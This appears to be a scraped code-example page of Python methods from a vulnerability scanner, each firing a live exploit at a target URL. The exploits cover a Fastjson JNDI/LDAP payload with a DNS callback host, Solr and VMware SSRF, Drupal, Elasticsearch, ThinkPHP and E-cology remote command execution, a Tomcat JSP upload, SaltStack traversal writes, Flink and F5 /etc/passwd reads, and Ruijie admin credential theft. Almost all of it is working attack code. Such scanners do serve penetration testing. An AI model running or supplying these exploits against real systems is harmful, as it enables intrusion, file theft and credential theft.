Exemple #10
0
 def fastjson_1262_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Fastjson: 1.2.62"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
     self.vul_info["vul_numb"] = "null"
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2019-10-07"
     self.vul_info["vul_vers"] = "<= 1.2.62"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \
                                 "(autoType功能默认关闭),另建议将JDK升级到最新版本。"
     self.vul_info["cre_date"] = "2021-01-21"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
     md = dns_request()
     dns = md
     data = {
         "@type": "org.apache.xbean.propertyeditor.JndiConverter",
         "AsText": "ldap://" + dns + "//exploit"
     }
     data = json.dumps(data)
     try:
         try:
             request = requests.post(self.url,
                                     data=data,
                                     headers=headers,
                                     timeout=self.timeout,
                                     verify=False)
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
         except:
             pass
         if dns_result(md):
             self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #11
0
 def cve_2021_27905_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
     self.vul_info["vul_numb"] = "CVE-2021-27905"
     self.vul_info["vul_apps"] = "Solr"
     self.vul_info["vul_date"] = "2021-04-14"
     self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "SSRF"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
     self.vul_info["cre_auth"] = "zhzyker"
     core_name = None
     dns = dns_request()
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except:
             pass
         payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
                   "=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
         url_ssrf = urljoin(self.url, payload)
         r = requests.get(url_ssrf,
                          headers=self.headers,
                          timeout=self.timeout,
                          verify=False)
         if dns in dns_result(dns):
             self.vul_info["vul_payd"] = url_ssrf
             self.vul_info["vul_data"] = dump.dump_all(r).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #12
0
 def cve_2014_3120_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Elasticsearch: CVE-2014-3120"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2014_3120.replace(
         "RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "Elasticsearch 命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2014-3120"
     self.vul_info["vul_apps"] = "Fastjson"
     self.vul_info["vul_date"] = "2014-04-29"
     self.vul_info["vul_vers"] = "< 1.2"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "命令执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Elasticsearch 1.2之前的默认配置启用动态脚本编制,该脚本允许远程攻击者通过_search的source" \
                                 "参数执行任意MVEL表达式和Java代码。"
     self.vul_info["cre_date"] = "2021-01-21"
     self.vul_info["cre_auth"] = "zhzyker"
     self.data_send_info = r'''{ "name": "cve-2014-3120" }'''
     md = random_md5()
     cmd = "echo " + md
     self.data_rce = self.payload_cve_2014_3120.replace("RECOMMAND", cmd)
     try:
         self.request = requests.post(self.url + "/website/blog/",
                                      data=self.data_send_info,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
         self.req = requests.post(self.url + "/_search?pretty",
                                  data=self.data_rce,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
         try:
             self.r = list(json.loads(
                 self.req.text)["hits"]["hits"])[0]["fields"]["command"][0]
         except:
             self.r = "null"
         if md in self.r:
             self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "] "
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #13
0
 def cve_2019_6340_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Drupal: CVE-2019-6340"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "drupal core restful remote code execution"
     self.vul_info["vul_numb"] = "CVE-2019-6340"
     self.vul_info["vul_apps"] = "Drupal"
     self.vul_info["vul_date"] = "2019-02-22"
     self.vul_info["vul_vers"] = "< 8.6.10"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "POST/PATCH 请求,在进行 REST API 操作的过程中,会将未经安全过滤的参数内容带入unserialize " \
                                 "函数而触发反序列化漏洞,进而导致任意代码执行。"
     self.vul_info["cre_date"] = "2021-01-29"
     self.vul_info["cre_auth"] = "zhzyker"
     self.path = "/node/?_format=hal_json"
     md = random_md5()
     cmd = "echo " + md
     self.cmd_len = len(cmd)
     self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
                                                  self.url)
     self.headers = {
         'User-Agent': self.ua,
         'Connection': "close",
         'Content-Type': "application/hal+json",
         'Accept': "*/*",
         'Cache-Control': "no-cache"
     }
     try:
         request = requests.post(self.url + self.path,
                                 data=self.payload,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         if md in misinformation(request.text, md):
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_urls"] = self.payload
             self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #14
0
 def time_2021_0515_poc(self):
     self.threadLock.acquire()
     self.vul_info[
         "prt_name"] = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "E-cology OA WorkflowServiceXml RCE"
     self.vul_info["vul_numb"] = "time-2021-0415"
     self.vul_info["vul_apps"] = "E-cology"
     self.vul_info["vul_date"] = "2021-05-15"
     self.vul_info["vul_vers"] = "E-cology <= 9.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "RCE"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "The WorkflowServiceXml interface can be accessed without authorization. The attacker can call this interface to construct a specific HTTP request to bypass the security restrictions of E-cology itself to achieve remote command execution."
     self.vul_info["cre_date"] = "2021-05-19"
     self.vul_info["cre_auth"] = "zhzyker"
     url = urljoin(self.url, "/services%20/WorkflowServiceXml")
     md = random_md5()
     cmd = "echo " + md
     headers = {
         'User-Agent': self.ua,
         'SOAPAction': '""',
         'cmd': cmd,
         "Content-Type": "text/xml;charset=UTF-8"
     }
     data = self.payload_time_2021_0515
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         #print(self.url + "  " + str(request.status_code) + request.text)
         if md in misinformation(request.text,
                                 md) and request.status_code == 500:
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = data
             self.vul_info["prt_info"] = "[rce: " + url + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #15
0
 def cve_2021_25282_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "SaltStack: CVE-2021-25282"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "SaltStack 任意文件写入漏洞"
     self.vul_info["vul_numb"] = "CVE-2021-25282"
     self.vul_info["vul_apps"] = "SaltStack"
     self.vul_info["vul_date"] = "2021-02-25"
     self.vul_info["vul_vers"] = "< 3002.5"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "未经授权的访问wheel_async,通过salt-api可以执行任意代码/命令。"
     self.vul_info["cre_date"] = "2021-03-02"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {
         "User-agent": self.ua,
         "Content-Type": "application/json",
         "Connection": "close"
     }
     url = self.url + "/run"
     path = "../../../../../../../../../tmp/vuln"
     data = {
         'eauth': 'auto',
         'client': 'wheel_async',
         'fun': 'pillar_roots.write',
         'data': 'vuln_cve_2021_25282',
         'path': path
     }
     data = json.dumps(data)
     try:
         r = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False)
         tag = list(json.loads(r.text)["return"])[0]["tag"]
         jid = list(json.loads(r.text)["return"])[0]["jid"]
         if r"salt/wheel" in tag:
             if jid in tag:
                 self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoC_MaYbE"
                 self.vul_info["vul_payd"] = path
                 self.vul_info["prt_info"] = "[upload:" + path + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #16
0
 def cve_2021_25646_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2021-25646"
     self.vul_info["vul_apps"] = "Druid"
     self.vul_info["vul_date"] = "2021-02-01"
     self.vul_info["vul_vers"] = "< 0.20.1"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \
                                 "此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \
                                 "经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \
                                 "攻击者可直接构造恶意请求执行任意代码,控制服务器。"
     self.vul_info["cre_date"] = "2021-02-03"
     self.vul_info["cre_auth"] = "zhzyker"
     url = urljoin(self.url, "/druid/indexer/v1/sampler")
     headers = {
         'Content-Type': 'application/json',
         'User-Agent': self.ua,
         'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
         'Connection': 'keep-alive'
     }
     md = dns_request()
     cmd = "ping " + md
     data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         if dns_result(md):
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["vul_payd"] = data
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #17
0
 def time_2021_0424_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Ruijie-EG Easy Gateway: time-2021-0424"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Get account password, background rce"
     self.vul_info["vul_numb"] = "time-2021-0415"
     self.vul_info["vul_apps"] = "RuiJie"
     self.vul_info["vul_date"] = "2021-04-24"
     self.vul_info["vul_vers"] = "unknow"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "RCE"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Get account password, background rce"
     self.vul_info["cre_date"] = "2021-04-26"
     self.vul_info["cre_auth"] = "zhzyker"
     url = urljoin(self.url, "/login.php")
     payload = "username=admin&password=admin?show+webmaster+user"
     try:
         request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False)
         res = json.loads(request.text)["data"]
         get_user = re.search('admin', res)
         if get_user:
             if r"01. " in res:
                 user = re.findall("00. (.*?) ", res)[0]
                 pasd = re.findall(r"admin (.*)\r\r", res)[0]
             else:
                 user = re.findall("00. (.*?) ", res)[0]
                 pasd = re.findall(r"admin (.*)", res)[0]
             if user and pasd:
                 self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["vul_payd"] = payload
                 self.vul_info["prt_info"] = "[username:"******"] [password:"******"]"
             elif user:
                 self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["vul_payd"] = payload
                 self.vul_info["prt_info"] = "[user&pass:"******"]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #18
0
 def cve_2017_12615_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Tomcat: CVE-2017-12615"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Apache Tomcat PUT 方法任意文件上传"
     self.vul_info["vul_numb"] = "CVE-2017-12615"
     self.vul_info["vul_apps"] = "Tomcat"
     self.vul_info["vul_date"] = "2017-09-20"
     self.vul_info["vul_vers"] = "7.0.0 - 7.0.81"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "任意文件上传"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Apache Tomcat如果开启PUT方法支持则可能存在远程代码执行漏洞,漏洞编号为CVE-2017-12615。" \
                                 "攻击者可以在使用该漏洞上传JSP文件,从而导致远程代码执行。"
     self.vul_info["cre_date"] = "2021-01-21"
     self.vul_info["cre_auth"] = "zhzyker"
     self.name = random_md5()
     key = random_md5()
     self.webshell = "/" + self.name + ".jsp/"
     self.payload1 = key
     self.payload2 = self.payload_cve_2017_12615
     try:
         self.request = requests.put(self.url + self.webshell,
                                     data=self.payload1,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         self.request = requests.get(self.url + self.webshell[:-1],
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         if key in self.request.text:
             self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = self.url + "/" + self.name + ".jsp"
             self.vul_info[
                 "prt_info"] = "[url: " + self.url + "/" + self.name + ".jsp ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #19
0
 def cve_2020_17519_poc(self):
     # 2021-01-07
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Apache Flink: CVE-2020-17519"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info[
         "vul_payd"] = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
     self.vul_info["vul_name"] = "Apache Flink 任意文件读取"
     self.vul_info["vul_numb"] = "CVE-2020-17519"
     self.vul_info["vul_apps"] = "Flink"
     self.vul_info["vul_date"] = "2021-01-05"
     self.vul_info["vul_vers"] = "1.5.1 - 1.11.2"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "任意文件读取"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Flink部分版本(1.11.0, 1.11.1, 1.11.2)中存在该漏洞,允许攻击者通过JobManager进程的REST " \
                                 "API,读取JobManager本地文件系统上的任意文件。访问仅限于JobManager进程可访问的文件。"
     self.vul_info["cre_date"] = "2021-01-07"
     self.vul_info["cre_auth"] = "zhzyker"
     self.pocname = self.vul_info["prt_name"]
     self.rawdata = None
     self.info = "null"
     self.method = "get"
     self.r = "PoCWating"
     self.poc = "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
     try:
         self.request = requests.get(self.url + self.poc,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         if r"root:x:0:0:root:/root:/bin/bash" in self.request.text and r"daemon:" in self.request.text:
             self.vul_info["vul_data"] = dump.dump_all(self.request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "prt_info"] = "[url: " + self.url + self.poc + " ]"
             verify.scan_print(self.vul_info)
         else:
             verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         print(e)
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #20
0
 def cve_2021_21975_poc(self):
     self.threadLock.acquire()
     self.vul_info[
         "prt_name"] = "VMware vRealize Operations Manager: CVE-2021-21975"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info[
         "vul_name"] = "VMware vRealize Operations Manager API SSRF"
     self.vul_info["vul_numb"] = "CVE-2021-21972"
     self.vul_info["vul_apps"] = "Vmware"
     self.vul_info["vul_date"] = "2021-03-31"
     self.vul_info["vul_vers"] = "<= 8.3.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "SSRF"
     self.vul_info["vul_data"] = "null"
     self.vul_info[
         "vul_desc"] = "攻击者通过访问vRealize Operations Manager API传递特定的参数到服务器端进行请求伪造攻击"
     self.vul_info["cre_date"] = "2021-04-01"
     self.vul_info["cre_auth"] = "zhzyker"
     try:
         headers = {
             "User-Agent": self.ua,
             "Content-Type": "application/json;charset=UTF-8"
         }
         dns = dns_request()
         data = '["' + dns + '"]'
         url = urljoin(self.url, "/casa/nodes/thumbprints")
         res = requests.post(url,
                             data=data,
                             headers=headers,
                             timeout=self.timeout,
                             verify=False)
         if dns_result(dns):
             self.vul_info["vul_data"] = dump.dump_all(res).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = data
             self.vul_info["prt_info"] = "[ssrf] [dns:" + dns + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #21
0
 def cve_2020_5902_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2020-5902"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
     self.vul_info["vul_numb"] = "CVE-2020-5902"
     self.vul_info["vul_apps"] = "Flink"
     self.vul_info["vul_date"] = "2020-07-15"
     self.vul_info["vul_vers"] = "< 11.6.x"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "Remote Code Execution"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "The Traffic Management User Interface (TMUI), also referred to as the " \
                                 "Configuration utility, has a Remote Code Execution (RCE) vulnerability in " \
                                 "undisclosed pages. (CVE-2020-5902)"
     self.vul_info["cre_date"] = "2021-03-20"
     self.vul_info["cre_auth"] = "zhzyker"
     url = urljoin(
         self.url,
         "/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=CVE-2020-5902")
     try:
         request = requests.get(url,
                                headers=self.headers,
                                timeout=self.timeout,
                                verify=False)
         if request.status_code == 200 and r"CVE-2020-5902" in request.text:
             url = self.url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
             request = requests.get(url,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
             if r"root:x:0:0:" in request.text and r"daemon:x:" in request.text and r"nologin" in request.text:
                 self.vul_info["vul_data"] = dump.dump_all(request).decode(
                     'utf-8', 'ignore')
                 self.vul_info["vul_payd"] = url
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[rce] [url:" + url + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #22
0
 def cve_2019_7238_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Nexus Repository Manager: CVE-2019-7238"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Nexus Repository Manager 3 远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2019-7238"
     self.vul_info["vul_apps"] = "Nexus"
     self.vul_info["vul_date"] = "2019-03-21"
     self.vul_info["vul_vers"] = "3.6.2 - 3.14.0"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能," \
                                 "而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞"
     self.vul_info["cre_date"] = "2021-01-27"
     self.vul_info["cre_auth"] = "zhzyker"
     md = random_md5()
     cmd = "echo " + md
     self.payload = self.payload_cve_2019_7238.replace("RECOMMAND", cmd)
     self.headers = {
         'Accept': '*/*',
         'User-agent': self.ua,
         'Content-Type': 'application/json'
     }
     try:
         request = requests.post(self.url + "/service/extdirect",
                                 data=self.payload,
                                 headers=self.headers,
                                 timeout=self.timeout,
                                 verify=False)
         if md in request.text:
             self.vul_info["vul_data"] = dump.dump_all(request).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info["vul_payd"] = cmd
             self.vul_info["prt_info"] = "[rce] [payload: " + cmd + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as e:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #23
0
 def cve_2019_9082_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "ThinkPHP: CVE-2019-9082"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = self.payload_cve_2019_9082.replace(
         "RECOMMAND", "whoami")
     self.vul_info["vul_name"] = "ThinkPHP5 5.0.23 远程代码执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2019-9082"
     self.vul_info["vul_apps"] = "ThinkPHP"
     self.vul_info["vul_date"] = "2018-12-11"
     self.vul_info["vul_vers"] = "< 3.2.4"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "ThinkPHP prior to 3.2.4, as used in Open Source BMS v1.1.1 and other products, " \
                                 "allows Remote Command Execution via public//?s=index/\think\app/invokefunction" \
                                 "&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command."
     self.vul_info["cre_date"] = "2021-01-29"
     self.vul_info["cre_auth"] = "zhzyker"
     self.pocname = "ThinkPHP: "
     md = random_md5()
     cmd = "echo " + md
     self.payload = self.payload_cve_2019_9082.replace("RECOMMAND", cmd)
     self.method = "get"
     self.rawdata = "null"
     bad = "20" + md
     try:
         self.request = requests.get(self.url + self.payload,
                                     headers=self.headers,
                                     timeout=self.timeout,
                                     verify=False)
         if md in self.request.text:
             if bad not in self.request.text:
                 self.vul_info["vul_data"] = dump.dump_all(
                     self.request).decode('utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
Exemple #24
0
 def cve_2018_1273_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Spring Data: CVE-2018-1273"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Spring Data Commons 远程命令执行漏洞"
     self.vul_info["vul_numb"] = "CVE-2018-1273"
     self.vul_info["vul_apps"] = "Spring"
     self.vul_info["vul_date"] = "2018-04-11"
     self.vul_info["vul_vers"] = "1.13 - 1.13.10, 2.0 - 2.0.5"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程命令执行漏洞"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "Spring Data Commons组件中存在远程代码执行漏洞," \
